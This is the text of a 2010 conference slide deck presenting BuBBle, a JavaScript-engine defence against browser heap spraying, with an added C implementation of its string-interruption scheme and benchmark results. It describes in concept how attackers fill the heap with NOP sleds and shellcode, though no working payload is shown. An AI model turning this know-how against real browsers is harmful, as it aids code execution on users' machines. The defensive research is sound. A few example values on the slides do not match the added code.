BuBBle: a Javascript engine level countermeasure against heap-spraying attacks
BuBBle: a Javascript countermeasure against heap-spraying attacks
Francesco Gadaleta, Yves Younan, Wouter Joosen
Katholieke Universiteit Leuven
ESSoS 2010, Pisa, 3-4 Feb.
Overview
‣ Heap-spraying attacks
‣ BuBBle approach
‣ Experiments and Results
‣ Conclusion
A new target: web browsers
Firefox vulnerabilities (http://www.mozilla.org/security/known-vulnerabilities/firefox35.html)
Integer overflow
Memory corruption
Heap buffer overflow in string to number conversion
Crash and remote code execution Flash player unloading
Problem description: the art of spraying the heap
[Figure: one heap block, a long NOP sled (0x90 0x90 0x90 ...) ending in SHELLCODE]
[Figure: sprayed heap, the same NOP sled + SHELLCODE block repeated many times across the heap]
Heap-spraying attacks
Assumptions
A buffer overflow/memory corruption vulnerability
Users allowed to allocate memory
Homogeneity of memory
BuBBle approach: Tracemonkey internals
Homogeneity of memory -> monolithic data structure
• Javascript Strings
BuBBle approach: the JSString type (Tracemonkey - Mozilla Firefox 3.7)
Tracemonkey internals
[Figure: a JSString with fields mLength and mChars; mChars points to a contiguous character array (0x90 0x90 ... NOP sled), which a sprayed string terminates with SHELLCODE]
BuBBle approach
• Introduce diversity in contiguous blocks of memory
• Transform Javascript strings (internal structure)
BuBBle approach
Hi. I am a dangerous string to jump into a shellcode
Transform
Hi. I am a dangerous string to jump into a shellcode
Restore
Hi. I am a dangerous string to jump into a shellcode
<Define string>
<Use string>
<support data structure>
[Figure: Transform happens at <Define string> and Restore at <Use string>; the changed characters are kept in the <support data structure>]
BuBBle approach: support data
• Interrupt array of characters
• Change characters at random positions: how many?
• Save support data
Support data layout: Num. intervals | Pos. 1st char | Value 1st char | Pos. 2nd char | Value 2nd char | ...
BuBBle approach: js_Transform()
    rand <- generate_random_position(0, MINLEN)
    len <- string.length()
    intervals <- len / MINLEN
    foreach (i in intervals)
        pos <- MINLEN * i
        save_position(pos + rand)
        save_value(character[pos + rand])
        change_value(character[pos + rand])
Example:
    "blah blah blah is a normal string with appended shellcode"
    len = 57
    intervals = 2
    rand <-
    support data (num. intervals, then pos./value pairs): 2, 7, a, 35, w
    "blah bl0xCCh blah is a normal string 0xCCith appended shellcode"
    128
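The js_Transform() pseudocode above, together with its inverse and the 0xCC (int3) interruption byte the security-evaluation slide refers to, as an added C example that is not from the BuBBle implementation or the Tracemonkey source. It assumes MINLEN = 24 (from the memory-overhead slide) and a caller-supplied random offset; the names bubble_transform, bubble_restore, longest_run, demo_roundtrip and demo_sled are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parameters. MINLEN = 24 follows the memory-overhead slide (one change per 24 bytes);
 * 0xCC is the x86 int3 opcode named on the security-evaluation slide, so a sled that
 * is executed traps at the first interruption instead of sliding into the payload. */
#define MINLEN        24
#define FILLER        0xCC
#define MAX_INTERVALS 1024

/* Support data, laid out as on the slide: number of intervals, then (position, original
 * value) pairs. The slide's structure is 2 bytes per interval; wider fields are used here
 * only for readability. */
typedef struct {
    size_t        intervals;
    size_t        pos[MAX_INTERVALS];
    unsigned char val[MAX_INTERVALS];
} support_t;

/* Stand-in for generate_random_position(0, MINLEN): an offset inside the first interval.
 * An engine should draw this from a CSPRNG; rand() is only for the stand-alone demo. */
size_t bubble_random_offset(void) {
    return (size_t)rand() % MINLEN;
}

/* js_Transform(): interrupt the character array once per MINLEN bytes at offset rand_off,
 * saving each clobbered character so the string can be restored when it is used.
 * Returns the number of intervals (characters changed). */
size_t bubble_transform(unsigned char *s, size_t len, size_t rand_off, support_t *sd) {
    size_t intervals = len / MINLEN;
    if (intervals > MAX_INTERVALS) intervals = MAX_INTERVALS;
    rand_off %= MINLEN;                       /* keeps every pos + rand_off < len */
    sd->intervals = intervals;
    for (size_t i = 0; i < intervals; i++) {
        size_t pos = MINLEN * i + rand_off;   /* save_position(pos + rand) */
        sd->pos[i] = pos;
        sd->val[i] = s[pos];                  /* save_value(character[pos + rand]) */
        s[pos] = FILLER;                      /* change_value(character[pos + rand]) */
    }
    return intervals;
}

/* Inverse operation performed at <Use string>: put the saved characters back. */
size_t bubble_restore(unsigned char *s, const support_t *sd) {
    for (size_t i = 0; i < sd->intervals; i++)
        s[sd->pos[i]] = sd->val[i];
    return sd->intervals;
}

/* Longest run of identical bytes: the property a NOP sled relies on. */
size_t longest_run(const unsigned char *s, size_t len) {
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < len; i++) {
        cur = (i > 0 && s[i] == s[i - 1]) ? cur + 1 : 1;
        if (cur > best) best = cur;
    }
    return best;
}

/* Round trip on the slide's 57-character example with offset 7: returns 1 on success. */
int demo_roundtrip(void) {
    const char *orig = "blah blah blah is a normal string with appended shellcode";
    unsigned char buf[64];
    support_t sd;
    size_t len = strlen(orig);                /* 57 -> intervals = 57 / 24 = 2 */
    memcpy(buf, orig, len + 1);
    if (bubble_transform(buf, len, 7, &sd) != 2) return 0;
    if (sd.pos[0] != 7 || sd.pos[1] != 31) return 0;          /* 7 and 24 + 7 */
    if (sd.val[0] != 'a' || sd.val[1] != 'n') return 0;        /* the clobbered originals */
    if (buf[7] != FILLER || buf[31] != FILLER) return 0;
    bubble_restore(buf, &sd);
    return memcmp(buf, orig, len + 1) == 0;
}

/* Constructed 4096-byte 0x90 sled: after transformation no run of identical bytes is
 * longer than 2 * MINLEN - 2 (MINLEN - 1 inside each interval, plus the unbroken tail). */
size_t demo_sled(void) {
    static unsigned char sled[4096];
    support_t sd;
    memset(sled, 0x90, sizeof sled);
    bubble_transform(sled, sizeof sled, 5, &sd);
    return longest_run(sled, sizeof sled);    /* 34 here: 4096 - (24 * 169 + 5) - 1 */
}

int main(void) {
    printf("round trip ok: %d\n", demo_roundtrip());
    printf("longest identical-byte run after transform: %zu\n", demo_sled());
    return 0;
}
```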
BuBBle approach: security evaluation
• What? We still spray the heap!
• Interrupt procedure call (.byte 0xcc)
• IE and Aurora against Google (Jan 2010)
Aurora-Google (1-0)
(slide shows the source of the Aurora exploit page, with its encoded shellcode and heap-spray script; the listing is omitted here)
BuBBle: performance benchmarks
• Macrobenchmarks
• Sunspider Benchmark Suite
• V8
• PeaceKeeper bench.
• Memory overhead analysis
Sunspider Javascript Benchmark Suite
Test Perf. overhead
3d 0.17%
bitops 0.89%
controlflow 1.44%
math 0.62%
regexp 0.23%
string-base64 27.3%
string-fasta 1.24%
string-tagcloud 2.20%
string-unpack 3.24%
string-validate 9.30%
Average 5.19%
Peacekeeper Javascript Benchmarks
Benchmark Perf. overhead
Rendering 0.5%
Social Networking 0.5%
Complex Graphics 2.2%
Data 14%
DOM ops. 0.2%
Text parsing 2.0%
Total 2.8%
Macrobenchmarks
Site URL Perf. overhead
economist.com 5.6%
amazon.com 4.7%
ebay.com 4.2%
facebook.com 4.9%
maps.google.com 3.2%
docs.google.com 6.3%
cnn.com 4.8%
youtube.com 4.9%
Average 4.8%
V8 Javascript Benchmarks
Benchmark Perf. overhead
Richards 5.6%
DeltaBlue 3.6%
Crypto 10%
Ray Trace 1.5%
EarleyBoyer 3.7%
RegExp 0.6%
Splay 1.8%
Total 2.6%
BuBBle: memory overhead
• 1/24 changes
• n-byte original string
• i = n/24
• support data structure 2i bytes long
• 8.3% memory overhead (theoretical and room for improvement)
Memory overhead analysis from proc file system
Benchmark Mem. overhead
Sunspider 5.6%
V8 4.2%
Peacekeeper 6.5%
Average 5.3%
Related work
• ASLR
Bhatkar, S., Duvarney, D.C., Sekar, R.: Address obfuscation: an efficient approach to combat a broad range of memory error exploits. In: Proceedings of the 12th USENIX Security Symposium, Washington, D.C., U.S.A. (August 2003)
• DEP
Data Execution Prevention: Windows Server 2003 with SP1
• Nozzle
Ratanaworabhan, P., Livshits, B., Zorn, B.: Nozzle: a defense against heap-spraying code injection attacks. Technical report, Microsoft Research (November 2008)
• Shellcode detection
Egele, M., Wurzinger, P., Kruegel, C., Kirda, E.: Defending browsers against drive-by downloads: mitigating heap-spraying code injection attacks. In: Flegel, U., Bruschi, D. (eds.) Detection of Intrusions and Malware, and Vulnerability Assessment. LNCS, vol. 5587, pp. 88–106. Springer, Heidelberg (2009)
Conclusion
• Lightweight solution (e.g. Mozilla Firefox, Mozilla Fennec)
• Implemented for Javascript strings
• Allocation of malicious objects from external media (mp3, ...)
• Future dev: protect arrays of integers, protect other engines
• Not just for browsers
?